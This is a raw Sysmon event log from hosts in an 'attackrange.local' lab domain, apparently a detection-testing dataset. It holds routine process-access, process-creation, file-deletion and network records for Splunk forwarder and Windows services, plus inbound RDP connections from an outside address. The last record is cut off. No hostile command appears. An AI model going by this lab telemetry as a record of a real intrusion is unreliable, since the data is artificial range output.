15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051213Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051212Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051211Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051210Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-ECAB-607E-0407-00000000BB01}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000051209Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.896{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-ECAB-607E-0407-00000000BB01}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000051208Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.897{85C0FFC9-ECAB-607E-0407-00000000BB01}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000051207Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.693{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=796B9AD16B70E1C712552B3E0FC8C643,SHA256=3D1F264C548A0C2D4AD0654347F16317E69349C35696476DC036D6F511FB7F07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051206Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.662{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=586907A0B76801BBACEA17095942DBCA,SHA256=9E8068AA19DA0D48C21B1212502448653D266C975CC8DE4BF16F3A166D2997A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051205Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.410{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58537-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051204Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:59.084{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28FCC13858A65FC35438F466BA54438F,SHA256=7529EDE2D73074FB36B8C9313AF58717FA61D9D8E47B7444C943A6AEA10F2DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:00.510{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=556BC894D8E6DC9877EB3779A6D7EC28,SHA256=E271EA468F6AA09460629127DE4B35BD9568812AF759F34F7E2139AB70B84E9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.261{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57677-false10.0.1.12-8089- 354300x800000000000000082467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:58.662{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-46034-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:58.493{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52569-false10.0.1.14win-dc-339.attackrange.local445microsoft-ds 23542300x800000000000000051223Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:00.710{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3530B4E3FE58D1F6E0886BCA9CC8CE79,SHA256=97156ADFFBC50871C23197D3B60A376CA8F746FC7B19D27881923F538CAC2B14,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051222Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.051{85C0FFC9-B7EA-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52569-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal445microsoft-ds 23542300x800000000000000051221Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:00.538{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=533CCD1855D2D0263A7BB369FFC1066E,SHA256=340BE06146D7C052395169CC429F9CF2277524E5BB52920C9B35BA51600000D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.838{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-ECAD-607E-760F-00000000BB01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.838{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.838{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-ECAD-607E-760F-00000000BB01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.838{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-ECAD-607E-760F-00000000BB01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.839{A7A01FEF-ECAD-607E-760F-00000000BB01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.619{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12CE32E6BE41AD890F9B6D544A2F2578,SHA256=293CB36FA1EF91F033E128E456F5E3D168539218A30EB012CF75BB8289EB0E17,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:59.913{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-47388-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:01.135{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78152CF3D5F9AF1DE260F4BD94BF3214,SHA256=512F97FDA2796A427B7A449BDD15DDCDF355E19628A031A7063F80B6B573D419,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051227Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:01.913{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC932B65E50C73A098D5CCECFBE51A71,SHA256=A70CF43C6D2E2DB016F1726DE46CC7A110231EC6DD2E89D155D6ECD194A595CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051226Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:01.710{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=234FF12480CBA894F8F9534483B7CCE8,SHA256=6CC0F3B8D845F3FEFB136D005D34FCCBB9CF9ABCFCA93223D3BFB9A5180C044E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051225Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.889{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59992-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051224Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.813{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52570-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000082494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.651{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA8C1F39B21F1413E56E834A4F0D079D,SHA256=26FE5ED12E8F1F69D1911B84D5B326E5BC8604FFC66D7D79AE47E673525CE145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.572{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28C005300363305A622CDA38012F0F34,SHA256=F39F628D2EAE9283A97C4CAF040B1BEA221AB9EAEF9F492B955B7E778EE5F75A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.510{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-ECAE-607E-770F-00000000BB01}6832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.510{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:02.510{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 